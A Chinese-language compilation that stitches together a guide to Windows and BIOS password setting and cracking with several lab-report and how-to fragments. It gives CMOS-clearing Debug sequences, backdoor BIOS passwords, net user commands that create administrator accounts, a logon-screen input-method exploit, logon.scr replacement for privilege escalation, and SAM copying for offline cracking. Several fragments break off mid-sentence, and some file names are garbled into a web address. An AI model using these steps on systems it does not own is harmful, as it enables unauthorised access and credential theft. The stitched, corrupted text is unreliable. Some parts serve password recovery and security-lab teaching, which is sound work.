Windows操作系统密码设置与破解方法个人心得

Windows操作系统密码设置与破解方法个人心得

在使用电脑的过程中，难免要与各类密码打交道，以下九种密码可能是大家用的最多的：BIOS 密码、安装密码、用户密码、电源管理密码、屏保密码、开机密码、上网密码、分级审查密码和共享密码。今天，我们就谈谈这些和我们息息相关的密码，本篇文章先讲九大常用密码的前五种密码。

一、BIOS密码

BIOS(Basic Input Output System)即基本输入/输出系统，它实际上是被固化到计算机主板上的ROM芯片中的一组程序，为计算机提供最低级的、最直接的硬件控制。和其它程序不同的是，BIOS是储存在BIOS芯片中的，而不是储存在磁盘中，由于它属于主板的一部分，因此大家有时就称呼它一个既不同于软件也不同于硬件的名字“Firmware”(固件)，它主要用于存放自诊断测试程序(POST程序)、系统自举装入程序、系统设置程序和主要I/O设备的I/O驱动程序及中断服务程序。

如果你不希望别人用自己的电脑，可设置BIOS的密码功能给电脑加一把“锁”。遗忘BIOS密码该怎么办呢？不要着急，以下几招可以帮助你。

根据用户设置的不同，开机密码一般分为两种不同情况，一种就是SetUP密码(采用此方式时，系统可直接启动，而仅仅只在进入BIOS设置时要求输入密码)；另一种就是System 密码(采用此方式时，无论是直接启动还是进行BIOS设置都要求输入密码，没有密码将一事无成)。对于用户设置的这两种密码，我们的破解方法是有所区别的：

(一)破解SETUP密码

如果计算机能正常引导，只是不能进入BIOS设置(即设置了SetUP密码)，那么我们有以下几种办法供您选择：

方法一：Dubug法

在遗忘密码之后只需在DOS状态下启动Debug，然后输入如下命令即可手工清除密码：_ o 70 16

_ o 71 16

_ q

另外，不熟悉Debug的用户也可下载一个专门破解CMOS密码的工具软件Cmospwd。然后在DOS启动该程序，它就会将用户的CMOS密码显示出来(Cmospwd支持Acer、AMI、 AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS)，使用非常方便。

方法二：软件破解

现在有很多检测系统或开机密码的软件，最常见的有BiosPwds、Cmospwd等。其中BiosPwds是其中比较优秀的一个，可以检测出 BIOS版本、BIOS更新日期、管理员密码、CMOS密码、密码类型等，而且使用方法简单，单击窗口中的“获取密码”按钮即可显示出BiosPwds所检测到的所有信息。

但是由于软件破解密码时，是对BIOS编码过的密码进行逆向解码，所以有时也许会发现程序的密码和真实的密码并不相同，这也属于正常现象，所以这一招有时会不灵的。

方法三：自己编制文件破解

进入MS-DOS环境，在DOS提示符号下输入EDIT并回车(若你发现按EDIT出现错误，就是说你没有https://www.docsj.com/doc/668103248.html,这个文件，请看下一条方法)，输入：

ALT+179 ALT+55 ALT+136 ALT+216 ALT+230 ALT+112 ALT+176 ALT+32 ALT+230 ALT+113 ALT+254 ALT+195 ALT+128 ALT+251 ALT+64 ALT+117 ALT+241 ALT+195

注：输入以上数据先按下ALT键，接着按下数字键盘里(按键盘上面那一排数字键是没有作用的)的数字键，输完一段数字后再松开ALT键，然后再按下ALT键。在操作过程中，屏幕上会出现一个乱字符，我们不用管它。然后在“file”菜单下选择“save”，保存为https://www.docsj.com/doc/668103248.html,文件，接着退出到MS-DOS环境下，找到https://www.docsj.com/doc/668103248.html,这个文件，看看他是否是20个字节，若不是就说明你输入错了，须重新输入。确认后，直接运行 https://www.docsj.com/doc/668103248.html,，屏幕上应该没有任何提示信息，然后重新启动计算机即可清除CMOS里的密码，当然，CMOS里的其它设置也会同时被清除，这就需要我们重新设置了。

方法四：DOS下破解

这个方法直接在MS-DOS环境下便可完成，在MS-DOS环境下输入：COPY CON https://www.docsj.com/doc/668103248.html, 后回车，继续输入如下十个字符：ALT+176 ALT+17 ALT+230 p ALT+176 ALT+20 ALT+230 q ALT+205 <空格>，然后按“F6”键，再按回车保存，运行https://www.docsj.com/doc/668103248.html,文件后，重新开机即可。

若没有密码根本不能启动计算机(即设置了System密码)，那我们就无法通过软件来解决密码遗忘的问题了。此时你可以采用以下几种办法：

第一招：通用密码

每个主板厂家都有主板设置的通用密码，以便于提供技术支持之用。如果我们知道了该主板的通用密码，那么无论是开

机，还是进行CMOS设置都可以“穿墙而入”当然不要用这个去干坏事哟！

需要注意的是各主板厂家出于某些原因，不同时期主板的通用密码会有所不同，因此这一招并不能通行天下，我们只有多尝试几次，是否有用就要看运气了！

Award BIOS通用密码：j256、LKWPPETER、wantgirl、Ebbb、Syxz、aLLy、AWARD?SW、AWARD_SW、j262、 HLT、SER、SKY_FOX、BIOSTAR、ALFAROME、lkwpeter、589721、awkard、h996、CONCAT、 589589。

AWI BIOS通用密码：AMI、BIOS、PASSWORD、HEWITT RAND、AMI_SW、LKWPETER、A.M.I。

第二招：CMOS放电

目前的主板大多数使用纽扣电池为BIOS提供电力，也就是说，如果没有电，它里面的信息就会丢失了。当它再次通上电时，BIOS就会回到未设置的原始状态，当然BIOS密码也就没有了。

我们先要打开电脑机箱，找到主板上银白色的纽扣电池。小心将它取下，再把机箱尾部电源插头拔掉，用金属片短接电池底坐上的弹簧片，大概隔30秒后，再将电池装上。

此时CMOS将因断电而失去内部储存的信息，OK！将它装回，合上机箱开机，系统就会提示“CMOS Checksum Error-DeFaults Loaded”，那就是提示你“CMOS在检查时发现了错误，已经载入了系统的默认值”BIOS密码破解成功。

第三招：跳线短接

如果主板的CMOS芯片与电池整合在了一块，或者是电池直接被焊死在了主板上，还有就是我们用了第二招“CMOS放电法”，结果没起作用，那么我们就要用跳线短接这一招了。

打开机箱后，在主板CMOS电池附近会有一个跳线开关，在跳线旁边一般会注有RESET CMOS(重设CMOS)、CLEAN CMOS (清除CMOS)、CMOS CLOSE(CMOS关闭)或CMOS RAM RESET(CMOS 内存重设)等字样，用跳线帽短接，然后将它跳回就行了！

由于各个主板的跳线设置情况不太一样，所以在用这一招的时候，最好先查阅主板说明书。忘了说一件事，在CMOS放电或者清除CMOS中的数据时，不要在系统开机的情况下进行，建议断掉电脑电源。

二、Windows的安装密码

首先谈谈安装密码。安装密码即Windows CDKEY，是安装Windows时所必须的，输入完毕会记录在注册表中。点击“开始”菜单下的“运行”，输入regedit打开注册表编辑器，你会发现Windows的安装密码在注册表的如下位置：HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼ProductId和HKEY_LOCAL_MACHINE＼

Software＼Microsoft＼Windows＼CurrentVersion＼ProductKey，如果哪天忘记了Windows 的安装密码到这里来看看就知道了。事实上，该密码并不重要，只是在重装Windows时有用处，安装后自动记录于此。如果你要重新安装Windows，又没有安装密码，不妨先到这里来看看并记录下来，以备后用。

三、用户密码

关于用户密码，很多人都存在一个误区，即认为用户密码就是开机密码。事实上Windows 在默认的情况下，是没有开机密码的。那么用户密码是用来干什么的呢？是用来保护“个性”的！系统允许设置多个用户，其目的并不是为了保护用户的隐私。而是为每一个用户保存了一组系统外观的配置，以适应不同用户不同的使用习惯，就像目前流行的“皮肤”一样，只不过要输入密码而已。所以这个密码根本起不到保密的作用，只是个摆设罢了。

用户密码可以在控制面板的“密码”或“用户”工具中设置：在控制面板中，双击“用户”图标，点击“新建”按钮，会出现“添加用户”窗口，点击“下一步”按钮，输入新添加的用户名，然后再点击“下一步”，在出现的窗口中输入新用户密码，接着点击“下一步”按钮，会出现“个性化设置”窗口，选择你需要的项目(不选也可以)，然后再次点击“下一步”按钮，就可以为本机添加一个新用户。用同样的方法给每个可以使用此机器的用户建立一个用户名，然后你就可以输入密码了，当然也可以留到用户登录后自己修改密码。

对Windows有点了解的人都知道在Windows 9X系统中，这个密码系统是毫无安全性可言的。它在开机或更换用户登陆时启动，输入正确的密码后就可以使用系统，但是即使不知道密码也可以用ESC键跳过登陆程序，直接进入系统。这时我们可以通过更改注册表，来强制用户在开机时必须要输入用户名和密码才能进入Windows。实现方法：点击“开始”菜单中的“运行”，输入regedit，打开注册表编辑器，依次打开到HKEY_LOCAL_MACHINE＼Network＼Logon，然后新建一个DWORD值，将其命名为“Mustbevalidated”，值改为1，就可以了。

和Windows 9X不同，Windows 2000在这一方面作了很大的改进，如果把系统设定为：用户必须输入用户名和密码才能使用本机，那么如果不输入正确的用户名密码就不能进入系统；同时将用户分为管理者、用户和来宾三类，各有其不同的权限。这为规范管理计算机用户提供了手段。

另外，熟悉Windows 9x系统的用户都知道，有关用户密码信息都存贮在Windows目录下扩展名为“.pwl”的文件中。这里告诉你一个简单而有效的保护方法：单击“开始”

→“运行”，输入sysedit命令，打开“系统配置实用程序”。选中关于文件System.ini 文件。这时你会发现在其列表项中有一项标题为 [Password Lists]的项，这就是有关用户密码文件的链接记录，其中SSJ=C:＼WINDOWS＼SSJ.PWL(等号前的“SSJ”为用户名，等号后为该用户密码文件的存放路径及文件名)。知道了这点，我们就可以对其进行修改，以便任意指定文件。比如，你可以事先将源文件SSJ.PWL改名并复制到另一目录中，如在DOS

方式下，执行命令：COPY C:＼WINDOWS＼SSJ.PWL C:＼WINDOWS＼SYSTEM＼S1.DAT。而后再将System.ini中密码文件的存放路径改为SSJ=C:＼WINDOWS＼SYSTEM ＼S1.DAT。这样，就没有人再能轻松地找到你的密码文件了。

如果遗忘Windows的用户密码会怎么样呢？放心，这不会影响系统的启动，但它将导致用户无法进入自己的个人设置，因此破解Windows的启动密码以找回丢失的“个性”也是很有必要的。为此，我们可删除Windows安装目录下的*.PWL密码文件及Profiles子目录下的所有个人信息文件，然后重新启动Windows，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接单击“确定”按钮，Windows密码即被删除。另外，将注册表HKEY_LOCAL_MACHINE＼Network＼Logon分支下的UserProfiles修改为“0”，然后重新启动 Windows也可达到同样的目的。

四、电源管理密码

Windows的电源管理功能也可以设置密码，设置此功能后，系统在从节能状态返回时就会要求输入密码，此后不知道密码的用户就无法令计算机从“挂起”状态返回正常状态，这就进一步地保证了计算机数据的安全。

在Windows 98中为电源管理功能设置密码的步骤为：

1、单击

“开始”按钮，然后依次选择“设置”→“控制面板”，启动Windows 98的控制面板。

2、双击“控制面板”中的“电源管理”图标，打开“电源管理属性”设置框。

3、从“电源管理属性”设置框中选择“高级”选项卡。

4、在“计算机退出待机状态时，提示输入密码”选项前打上“√”。

5、选择“电源管理属性”设置框中的“电源方案”选项卡。

6、在“系统等待状态”列表框中选择计算机在没有操作之后自动启动电源管理功能(即进入“挂起”状态)的时间间隔，主要有“从1分钟之后”到“从不”等不同选项，用户可自行选择。

7、为“关闭显示器”和“关闭硬盘”设置合适的时间间隔。

8、单击“确定”按钮，关闭“电源管理属性”设置框。

这样我们就启动了Windows 98的电源管理功能，并为其设置了适当的密码。值得注意的是，Windows 98电源管理功能的密码是以Windows 98本身的用户密码为基础的，也就是说我们首先必须为Windows 98设置用户密码，然后才能使用它的电源管理密码功能，否则无效。另外，Windows 98电源管理功能并没有单独的密码，它的密码与Windows 98的用户密码完全一样，这也就省去了用户同时记忆多个密码的不便。但从另一个角度来说，电源管理功能的密码与用户密码完全一样，会很不安全，我们只要按照前面的方法破解了Windows 的用户密码，其电源管理密码也就不攻自破了。

五、屏保密码

接下来再说说屏保密码。它的作用主要是在你暂时离开计算机，不想关机，又怕此时有人趁机在你的电脑中看到你在干什么或乱动你的机子，此时屏保密码可以起到一定的保护作用，而且它比用户密码的口碑要比用户密码稍微好那么一点点。如果密码不对，是很难通过的。

我们先来看看屏保密码如何设置。首先在桌面空白处

右击鼠标，从快捷菜单中选择“属性”命令，就会打开“显示属性”对话框，该对话框中有“背景”、“屏幕保护程序”、“外观”、“效果”、“Web”、“设置”六个标签项。点击“屏幕保护程序标签”就会打开“显示属性”，在该窗口的“屏幕保护程序”下拉列表框中有Windows附带的各种屏幕保护程序，当我们从中选择了某种屏幕保护程序后，点击“预览”就会出现屏幕保护程序的效果，单击“预览”还可以全屏显示(点击鼠标就会还原)。“设置” 按钮可以对屏幕保护程序的显示效果进行设置，在“等待”微调框中可以输入或调整启动屏幕保护程序的时间。更诱人的是，屏幕保护程序还有一定的保密功能呢！如果你希望在自己在离开时他人无法使用计算机，那么最简单的一个方法就是启用屏幕保护程序的密码功能，勾选中“密码保护”框，单击“更改”按钮将出现一个“更改密码”对话框，然后把密码输入两次并确认就可以了。

如果一不小心忘了屏幕保护程序的密码，怎么办？直接关机吗？那可太野蛮了；而且，万一你的工作没有保存，岂不是前功尽弃！现在，只要你知道自己机器的IP地址，采用下面这个方法，你的难题就迎刃而解了！

其实方法很简单，首先要在你的机器所在的局域网内利用另外一台机器作为解码机，将解码机的IP地址改为你的IP地址，利用硬件冲突的优先级较高的原理就可以使_blank>操作系统跳过屏幕保护程序了。

具体实现方法如下：

在这台解码机上找到“开始菜单”中“设置”一项，单击“控制面板”,进入“控制面板”，双击“网络”的图标，进入“网络”对话框。

选择“配置”选项卡，然后双击“TCP/IP”，进入“TCP/IP属性”对话框，选择“IP

地址”选项卡，将解码机的IP地址改为你的IP地址，完成后单击“确定”按钮.

系统会提示你新的设置要重新启动计算机才能生效，确认并重新启动计算机。

这样，在局域网内就有两台机器的IP地址是相同的。当解码机的启动完成后，在你的机器和解码机上会同时弹出“IP地址产生硬件冲突”的提示框，这时只要在你的机器上点

击确定，猜猜会发生什么情况？没错，系统不要求你输入屏幕保护程序的密码，就直接进入_blank>操作系统的桌面了！

这下你不必为忘记密码而发愁了吧？不过值得注意的是，在整个破解的过程中，要确保你的机器上没有请求输入屏保程序密码的对话框，否则确定硬件冲突后，系统还会继续要求你输入屏幕保护程序的密码。

系统的屏幕保护密码是非常脆弱的。我们在遗忘密码之后只需使用“复位”键强行启动计算机(某些设计不完善的屏幕保护程序甚至可以使用Ctrl＋ Alt＋Del强行关闭，其操作就更简单了)，然后右击桌面空白处并从弹出的快捷菜单中执行“属性”命令，打开“显示属性”设置框并单击“屏幕保护”选项卡，最后取消“密码保护”选项即可(取消该选项时无需确认密码)。

这里再告诉大家一个更简便的方法。大家都知道，屏幕保护密码最多为16个字符。微软内置了16字节的密钥：48 EE 76 1D 67 69 A1 1B 7A 8C 47 F8 54 95 97 5F。Windows 便用上述密钥加密你输入的密码。其加密过程为：首先将你输入的密码字符逐位转换为其

16进制的ASCⅡ码值(小写字母先转为大写字母)，再依次与对应密钥逐位进行异或运算，把所得16进制值的每一位当作字符，转换为其16进制ASCII码，并在其尾加上00作为结束标志，存入注册表 HKEY_CURRENT_USER＼Control Panel＼desktop下的二进制键ScreenSave_Data中。所以把存放在注册表的HKEY_CURRENT_USERS＼ ControlPanel＼Desktop＼ScreenSave_Data主键下的Windows屏保密码的密文，删掉就可以了！

另外，目前市面上还出现了一种专门用于破解屏幕保护密码的光盘。插入该光盘之后，它就会利用Windows 98的自动运行功能启动保存在光盘上的屏幕保护密码破解程序，对屏幕保护功能的密码进行分析、破译，最后再将密码显示在屏幕上或写到软盘上，这就更方便了。

关于屏保密码还有一个烦恼——有些朋友总喜欢鼓捣电脑，经常给屏幕保护设置密码，如果是自己家里的也就罢了，如果是学校机房或街头网吧里的电脑，那就有些麻烦了。有此屏保密码烦恼的朋友不要急，我们可以把屏幕保护密码的功能给屏蔽掉，使其无法设置密码，这样就可以解决这些麻烦事了。具体的操作方法如下：点击“开始”→“运行”菜单，在打开的“运行”对话框中输入Regedit，回车，就打开了注册表编辑器，找到

HKEY_CURRENT_USER＼ControlPanel＼desktop＼ScreenSaveUsePassword(如果没有“ScreenSaveUsePassword”就新建这个Dword值，方法是：右键点击“Desktop”，在弹出的菜单中选择“新建”→ “DWORD值”，并将其命名为“ScreenSaveUsePassword”即可)，就是这个键决定屏幕保护程序是否使用密码，其键值为0或1，为“0”时表示不设置密码，为“1”则表示使用预设的密码。我们将这个值改为“0”就可以禁止屏幕保护程序使用密码。

加密技术及密码破解实验报告

第九章、实验报告 实验一、设置Windows启动密码 一、实验目的：利用Windows启动密码保存重要文件。 二、实验步骤： 1、在Windows XP系统中选择开始——运行，在打开输入框中“syskey.exe”,点击确定，打开“保证Windows XP账户数据库的安全”对话框。 2、单击【更新】，打开【启动密码】对话框，然后输入密码，在【确认】文本框中再次输入密码，单击【确定】

实验二、为word文档加密解密 一、实验目的:保护数据的安全 二、实验步骤： 1、打开一个需要加密的文档，选择【工具】——【选项】——【安全性】然后输入想要设置打开文件时所需的密码 2、单击【高级(A)】打开加密类型对话框，选中【加密文档属性】复选框，单击【确定】。

3、打开文件的【确认密码】对话框，输入打开文件时需要的密码，单击【确定】，随即打开【确认密码】对话框，输入密码。 4、保存文件后，重新打开Word文档，打开【密码】，输入打开文件所需的密码，单击【确定】输入修改的密码，单击【确定】 破解word密码 （1）安装Advanced Office Password Recovery软件，安装完成后打开需要破解的word 文档，进行暴力破解，结果如图所示： 实验三、使用WinRAR加密解密文件

一．实验目的：加密文件，保证文件的安全性。 二．实验步骤： 1、在需要加密的文件夹上右击，选中【添加到压缩文件】打开【压缩文件名和参数】 2、选中【压缩文件格式】组合框中的【RAR】并在【压缩选项】中选中【压缩后删除源文件】然后切换到【高级】，输入密码，确认密码。 3、关闭对话框，单击确定，压缩完成后，双击压缩文件，系统打开【输入密码对话框】 破解WinRAR加密的文件 （1）安装Advanced RAR Password Recovery软件，打开WinRAR加密文件，进行暴力破解，获得密码。结果如图：

最简单的破解Windows忘记密码的方法(图)

最简单的破解Windows忘记密码的方法(图) 先说说sfcfiles.dll文件的作用吧！ sfcfiles - sfcfiles.dll - DLL文件信息 DLL 文件：sfcfiles 或者sfcfiles.dll DLL 名称：Microsoft Windows File Protection 描述： sfcfiles.dll是系统文件监视和验证相关程序。 属于：Microsoft Windows 系统DLL文件：是 常见错误：File Not Found, Missing File, Exception Errors 安全等级(0-5): 0 间谍软件：否 广告软件：否 win的密码丢失实在是件令人头痛的事，尽管可以用ERD Commander等工具启动并修改密码，但要下载这些庞然大物也需要很久，而利用其他的方法太烦琐，用DreampackPL

生成的一个DLL来解决吧。 这个是我将sfcfiles.dll文件先Copy到一个磁盘里面，然后在更改密码的时候就不用U盘了，但是真实的环境是需要使用U盘来帮助你完成这个操作的，或者你之前有将sfcfiles.dll 文件Copy到非C盘的磁盘里面也可以的，然后重启电脑，进入DOS界面。 使用DOS启动盘(如果分区是NTFS，则需要下载支持NTFS的启动盘)启动计算机。 用ren命令将c:\windows\system32目录下的sfcfiles.dll改名为sfcfiles.lld(此处主要

不要改成其他文件名，否则下面的步骤中无法恢复此文件,更改的格式如：ren sfcfiles.dll sfcfiles.lld)。 接着将刚下载的sfcfiles.dll复制到c:\windows\system32目录 重起计算机，在出现登陆界面时，你会看到一个DreampackPL的界面，点击其中的Details 按钮，在出现密码窗口中选择相应的用户，然后点击“重设密码”以设定新密码。

dos命令及破解windows密码

2010年最新破windows密码： 1．BIOS没设密码：按F8进命令行的安全模式的cmd，输入：net user (name) (password) /add 回车：新建用户，重起。 2．BIOS设密码：进光盘启动，用C:\WINDOWS\repair\sam，代换C:\wiindows\system32\config\sam 解谜： （一）远程获取 系统管理员帐号administrator密码丢失、无其它可登陆用户帐号、无输入法漏洞等可利用漏洞，无法取得SAM文件、无输入法漏洞。提供IIS服务等，并有若干漏洞。 所需工具：GFI LANguard Network Scanner（或其它同类漏洞扫描软件） 其它：待破解系统处于局域网中。 1、猜解密码 通过网络连到机器 利用IP地址（流光，猜举方式，字典文件存有常见密码） 2、漏洞BUG利用 对于不同的漏洞可以使用不同的方法入侵，进而取得对系统的控制。 A、输入法漏洞 只在中文的Windows 2000SP1前中有。 切换输入法，帮助，输入法入门，工具栏空白处右击，跳转至c:\，右拖文件创建快捷方式，目标处输入c:\winnt\system32\net user administrator 123双击执行，更改密码，登录。 或者创建新用户，c:\winnt\system32\net user mmm 456 /add。执行。 加入管理员组，c:\winnt\system32\net.exe localgroup administrator mmm /add。 解决办法：删除帮助，打SP1。 B、IIS漏洞 IDQover.exe（利用应用程序缓冲区溢出漏洞，正向连接和反向连接两种方式）SP2以后无此漏洞。入侵成功后，利用返回的SHELL（一般用CMD.exe）使用 TELNET。 查看本机已经启用的端口netstat -na(1023以内占用较多) NC.exe（反向连接）sp3后无。 C、服务漏洞 D、系统漏洞 3、D.O.S. 4、特洛伊木马：服务木马，一般在前期入侵成功，以种服务的方式，在系统中留后门。 5、邮件病毒 （二）本地用户即可触摸到计算机！ 如果是本地用户的话：一般win-xp系统安装时都会要求添加用户，所以一般情况可登陆的用户有默认的administator和你安装时候添加的用户，其中administator是默认的系统管理员，添加的用户可以是管理员，也可以是普通用户。针对不同情形可考虑以下措施： 1、如果你想获得用户比如juntuan的密码，而安装时系统用户administator没设置密码，那么可在登录界面上，按住Ctrl+Alt键，再按住Del键一次或二次，即可出现经典的登录画

口令破解与防御技术-Windows本地密码破解(Ic)实验

默认登录，然后会要求创建一个新账户，以进入Windows XP时使用此新建账户登录，而且在Windows XP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。 当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。 方法2——删除SAM文件(注意，此法只适用于WIN2000) Windows NT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager , SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识完全不同。因此，一旦某个帐号被用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。安全帐号管理器的具体表现就 是%SystemRoot%system32configsam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中。 知道了这些，我们的解决办法也产生了:删除SAM文件，启动系统，它会重建一个干净清白的SAM，里面自然没有密码了。 不过，这么简单的方法在XP是不适用的，可能微软以此为BUG，做了限制……所以现在在XP系统下，即使你删除了SAM，还是不能删除密码，反而会使系统启动初始化出错，从而进入死循环而不能进系统! 方法3——从SAM文件中找密码(前提……会使用DOS基本命令就行)在系统启动前，插入启动盘，进入:C:WINNTSystem3Config 用COPY命令将SAM文件复制到软盘上。拿到另一台机子读取。这里需要的工具是LC4，运行LC4，打开并新建一个任务，然后依次击“IMPORT →Import from SAM file”，打开已待破解的SAM文件，此时LC4会自动分析此文件，并显示出文件中的用户名;之后点击“Session→Begin Audit”，即可开始破解密码。如果密码不是很复杂的话，很短的时间内就会得到结果。 不过，如果密码比较复杂的话，需要时间会很长，这时我们就需要用下面的方法了。 方法4——用其他SAM文件覆盖(前提是你可以得到另外一台电脑的SAM文件和它的密码) 1—如上所说，SAM文件保存着登录名以及口令，那么我们只要替换SAM文件就是替换登录名以及口令了。不过，这个替换用的SAM文件的“产地”硬盘分区格式要和你的系统一样(看是FAT32还是NTFS，你自己确认)。最好这个“产地”的系统没有设密码，安全方面设置没

教你如何破解系统登陆密码

教你如何破解系统登陆密码 系统密码是你登录到操作系统时所使用到的密码，它为你的计算机提供了一种安全保护，可以使你的计算机免受非法用户的使用，从而保障电脑和机密数据的安全。但是，如果我们忘记了系统密码，又不能随便重装系统，我们就只有想办法来破解密码了。 1、Windows98/ME的系统登录密码 1）取消法 最简单的一种方法是在系统登录要求输入密码时，你什么也不用输入，直接点击取消，可以进入操作系统。但用此种方法只能访问本机的资源，如果计算机是局域网的一部分，你将不能访问网络资源。 2）新增使用者 当你由于密码问题被挡在系统之外时，不妨为系统再新增一个使用者，然后重新登录，一样可以登录系统并访问系统或网络资源。单击“开始”——“设置”——“控制面板”，然后双击“用户”，打开“用户属性”对话框。接着，根据提示依次输入“用户名”、“密码”、“个性化项目设置”中所需的内容，最后单击“完成”。 3）删除“PWL”文件 删除Windows安装目录下的.PWL密码文件和Profiles子目录下的所有个人信息文件，然后重新启动Windows，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击“确定”按钮，Windows密码即被删除。

4）修改注册表 运行注册表编辑器，打开注册表数据库“HKEY＿LOCAL＿MACHIN E\Network\Logon”分支下的“username”修改为“0”，然后重新启动系统，也可达到去掉密码的目的。 2、破解WindowsNT密码 如果你有普通用户账号，有一个很简单的方法获取NTAdministrator 账号：先把c:\winntsystem32下的logon.scr改名为logon.old备份，然后把usrmgr.exe改名为logon.scr再重新启动。logon.scr是系统启动时加载的程序，重新启动后，不会出现以往的登录密码输入界面，而是用户管理器，这时你就有权限把自己加到Administrator组。 3、Windows2000密码 启动盘启动电脑或引导进入另一操作系统（如Windows98），找到文件夹"X:\Documents and Settings＼Administrator"（X为Windows2 000所在磁盘的盘符），将此文件夹下的"Cookies"文件夹删除，然后重新启动电脑，即可以空密码快速登录Windows2000。 4、破解WindowsXP的密码 在启动WindowsXP时按F8键选择带命令行的安全模式，使用net 命令可以对用户身份进行操作。具体步骤如下：使用命令“netuserabcd /add”添加一名为abcd的用户，使用命令“netlocalgroupadministrators abcd/add”将用户abcd提升为管理员，重新启动电脑，用abcd身份登录，最后对遗忘密码的用户进行密码修改即可

实验2账号口令破解及Windows安全设置

实验2 账号口令破解及Windows安全设置1 实验目的 1、通过密码破解工具的使用，了解账号口令的安全性，掌握安全口令的设置原理，以保护账号口令的安全。 2、通过在Windows Server 2003/2008R2/Win7/Linux等系统中账号和口令等安全策略设置，掌握通过安全策略设置增强操作系统安全性的方法。 2 实验环境 VMware中预装Windows Server 2003/2008R2/Windows 7/CentOS6.1的计算机，并且能够互相联通。Win 7中安装L0phtCrack 软件。 3 实验原理或背景知识 系统用户账号、密码、口令的破解主要是密码匹配的破解方法，最基本的有两个：穷举法和字典法。穷举法将字符和数字按照穷举的规则生成口令字符串，进行遍历尝试。字典法则用口令字典中事先定义的常用字符去尝试匹配口令。口令字典可以自己编辑或由字典工具生成，里面包含了单词或数字的组合。 在Windows操作系统中，用户账户的安全管理使用了安全账号管理器（SAM，Security Account Manager）的机制，用户和口令经过加密Hash变换后以Hash列表形式存放在%SystemRoot%\System32\config下的SAM文件中。该文件默认是需要管理员权限才能读取的。在Windows中即便是管理员也不能复制和阅读该文件，可以使用第三方的工具软件，利用管理员的权限来读取该文件。LC就是通过破解这个SAM文件来获得用户名和密码的。 暴力破解（穷举法）理论上可以破解任何密码和口令，但如果口令较为复杂，暴力破解需要的时间会很长，在这段时间内增加了用户发现入侵和破解行为的机会，从而能够采取措施来阻止破解，所以口令应具备一定的复杂性。一般设置口令应遵行以下原则： 1、口令长度不小于8个字符。 2、包含有大写和小写的英文字母、数字和特殊字符的组合。 3、不包含姓名、用户名、单词、日期以及这些项目的组合。 4、定期修改口令，并且新旧口令应有较大的区别。 4 实验任务 1、安装并使用LC6对系统进行账号和密码的破解，从而掌握使用工具软件进行账号密码破解的方法和步骤，加深对网络攻击过程的理解。 2、在Windows系统中进行账号和口令等安全策略设置，掌握通过安全策略设置增强操作系统安全性的方法。

口令破解实验

口令破解实验 Company number：【0089WT-8898YT-W8CCB-BUUT-202108】

华北电力大学 实验报告 | | 实验名称网络攻击与防范实验 课程名称口令破解实验 | | 专业班级：学生姓名： 学号：成绩： 指导教师：实验日期： 口令破解实验 一、实验目的与要求 1、了解 Windows 系统密码的结构及构造原理。 2、了解 Windows 系统密码文件（SAM 文件）的相关知识。 3、掌握获取 Windows 用户密码的方法。 4、创建三组用户名和密码（复杂各不相同），采用不同模式破解，给出详细步骤及 结果。 二、实验环境 1、VPC1(虚拟PC）：操作系统类型：windows xp；网络接口：eth0。 2、VPC1连接要求：与实验网络相连。 3、软件描述：，，John The 。

三、实验内容 1、在Windows系统下用SAIMnside和PwDump破解本地用户登录口令。 2、在Windows系统下用John The Ripper和PwDump破解本地用户登录口令。 四、实验正文 （一）在Windows系统下用SAIMnside和PwDump破解本地用户登录口令 1、使用pwdump 等工具获取 Windows 系统密码 Hash 值。 2、使用SAMInside工具对 Windows 系统密码进行破解。 Pwdump的使用语法为： pwdump [-h][-o][-u][-p][-n] machineName 其中： machineName——目标计算机名称。 -h——显示本程序的用法。 -o——指定导出后的口令散列值的存储文件。 -u——指定用于连接目标的用户名。 -p——指定用于连接目标的口令。 -s——指定连接上使用的共享，而不是搜索共享。 -n——跳过口令历史。 实验步骤： 1、使用默认用户名：administrator，密码：123456，登录到windows xp环境 2、打开开始——控制面板 点击“切换到经典视图” 3、双击“用户账户” 4、进入如图所示界面，点击Administrator。

win2003破解登录密码的方法

具体操作示范 ①添加用户 在电脑启动时按〔F8〕选 带命令行的安全模式〔Safe Mode With Command Prompt〕 选〔Administrator〕后便会跳出〔Command Prompt〕的窗口 用〔Net〕的命令增加一个用户，例：用户hanhezhai net user hanhezhai /add 将用户升至 Administrator 权力 net localgroup administrators hanhezhai /add 完成后重启电脑，在启动画面上加了一个用户hanhezhai ，进入 登录后在〔控制台〕→〔使用者帐户〕→选忘记密码的用户，然后选〔卸载密码〕后〔等出〕 在登录画面中选原来的用户便可不需密码情况下等入 (因已卸载了) ②更改密码 1.开机启动Win XP，当运行到“正在启动Windows XP”的提示界面时，按“F8”键调出系统启动选择菜单，选择“带命令行安全模式”； 2.当运行停止后，会列出“Administrator”和其它用户的选择菜单(本例的其他用户以xpuser01为例)，选择“Administrator”后回车，进入命令行模式； 3.键入命令““net user xpuser01 1234/ADD”这是更改该用户密码的命令，命令中的“1234”是更改后的新密码，如果键入的用户不存在（xpuser01），那么系统会自动添加这个用户。 4.另外还可以使用“net 1oca1group administrator xpuser01 /ADD”命令把xpuser01这个用户升为超级用户，即可拥有所有权限。 5.最后一步，就是重新启动计算机，在登录窗口中输入刚刚更改的新密码便可成功登陆。 然而，这种方法只能对付系统本来就没有给默认的Administrator账号设置密码的情况。要是原系统中已经给它设置了密码，则根本无法用这种方法登录系统，更不要说用“Net user”了。 2. 删除系统文件夹System32/Config下的SAM文件。这种方法只在Windows 2000中有效，要是用来对付Windows XP和Windows 2003，则会在启动系统时出现“安全账户初始化失败”的提示，使整个系统无法使用。

修改windows密码

